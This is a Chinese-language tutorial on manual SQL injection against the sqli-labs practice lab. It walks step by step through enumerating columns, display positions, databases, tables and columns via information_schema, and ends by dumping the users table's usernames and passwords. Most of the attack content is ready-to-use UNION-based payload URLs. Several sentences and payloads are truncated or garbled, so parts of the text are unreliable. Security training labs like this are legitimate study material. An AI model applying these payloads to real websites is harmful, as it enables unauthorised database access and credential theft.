sql注入之手工注入示例详解
前言 这篇文章就是一个最基本的SQl手工注入的过程了。基本上在sqlilabs上面的实验,如果知道了其中的全部知识点,都可以通过以下的步骤进行脱裤。下面的这个步骤也是其他的脱裤手段的基础。如果想要精通SQL注入,那么这个最基本的脱裤步骤是必须了解和掌握的。 为了方便说明,我们还是用之前的数字型的注入点为例来进行说明。 得到字段总数 在前面的介绍中,我们已经知道在 后台的SQL语句的写法大致为 select username,password,[....] from table where id=userinput 那么我们通过使用 那么payload变为: http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4.... 当使用 得到显示位 在页面上会显示从 使用如下的payload(两者均可)进行判断。 http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3 http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,3 当使用个如上的payload时,页面的显示如下: 通过如上的页面显示就可以知道,页面中显示的是第2位和第3位的信息。 查选库 在知道了显示位之后,那么接下来就可以通过显示位来显示我们想知道的信息,如数据库的版本,用户信息等等。那么我们使用如下的payload就可以知道相关的信息。 http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database() 此时页面的显示为: 可以看到在页面上就出现了数据库的版本信息和当前使用的数据库信息。 那么接下来我们通过这种方式知道数据库中所有的数据库的名称。 payload如下: http://localhost/sqlilabs/Less-2/?id=-1 union select 1,SCHEMA_NAME,from information_schema.SCHEMATA limit 0,1 #得到第一个库名 http://localhost/sqlilabs/Less-2/?id=-1 union select 1,from information_schema.SCHEMATA limit 1,1 #得到第二个库名 ... 查选表名 由于 那么我们构造的payload如下: http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() 这样我们就得到当前数据库下所有的表名了。页面返回的结果是: 所以我们知道在当前的数据库中存在4张表,分别是 查选列名 在知道了表名之后,接下来我们利用 payload如下: http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' http://localhost/sqlilabs/Less-2/?id=-1 union select 1,3 from information_schema.columns where table_name=0x7573657273(users的十六进制) 页面的显示结果如下: 通过这个语句,我们就知道在users表中存在 通过上面的payload,我们也同样可以知道在 但是有的时候后台的代码可能仅用了使用 猜解的语句如下: http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users) 主要的语句就是 如下如所示: 下面这个就是猜解到了users表中存在的字段。 http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users) 猜测在users表中存在 脱裤 在知道了当前数据库所有的表名和字段名之后,接下来我们就可以dump数据库中所有的信息了。比如我们下载当前users表中所有的数据。 可以使用如下的payload: http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users 就可以得到users表中所有的 总结 以上就是说sql手工注入的完整示例介绍,不知道大家都学会了?小编还需继续更新关于sql注入的文章,请继续关注编程小技巧。 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |